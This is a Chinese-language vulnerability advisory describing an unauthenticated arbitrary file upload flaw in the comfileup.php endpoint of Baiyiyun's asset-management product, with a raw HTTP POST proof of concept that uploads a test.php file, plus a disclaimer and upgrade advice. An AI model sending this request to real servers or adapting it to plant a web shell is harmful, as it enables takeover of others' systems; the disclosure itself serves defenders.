漏洞预警 | 资管云任意文件上传漏洞

漏洞预警发布时间：2024-07-31 08:01:25 43 浏览

0x00 漏洞编号

暂无

0x01 危险等级

高危

0x02 漏洞概述

资管云是一款功能全面、智能化程度高、灵活配置性强、无缝集成的资产管理解决方案，能够为客户提供高效、便捷的资产管理服务。

0x03 漏洞详情

漏洞类型：任意文件上传

影响：获取服务器权限

简述：百易云资管云的comfileup.php接口存在任意文件上传漏洞，未经身份验证的攻击者通过漏洞上传恶意后门文件，执行任意代码，从而获取到服务器权限。

0x04 影响版本

百易云资管云

0x05 POC

POST /comfileup.php HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0)Gecko/20100101 Firefox/127.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: cna=JtMCH7NgWFYCAXBg5XNzopCeUpgrade-Insecure-Requests: 1Priority: u=1Content-Type: multipart/form-data; boundary=--------1110146050
----------1110146050Content-Disposition: form-data; name="file";filename="test.php"
test ----------1110146050--

仅供安全研究与学习之用，若将工具做其他用途，由使用者承担全部法律及连带责任，作者及发布者不承担任何法律及连带责任。

0x06 修复建议

目前官方已发布漏洞修复版本，建议用户升级到安全版本：

https://www.baiyishequ.com/

暂无

为您推荐

漏洞预警 | 百易云资产管理运营系统SQL注入漏洞

漏洞预警 | 灵当CRM任意文件读取漏洞

漏洞预警 | 用友移动系统管理SQL注入漏洞

漏洞预警 | 灵当CRM任意文件读取漏洞

【漏洞预警】VMware vCenter Server 堆溢出漏洞(CVE-2024-38812)

【漏洞预警】Apache Solr高危漏洞曝光,速查你的系统是否中招!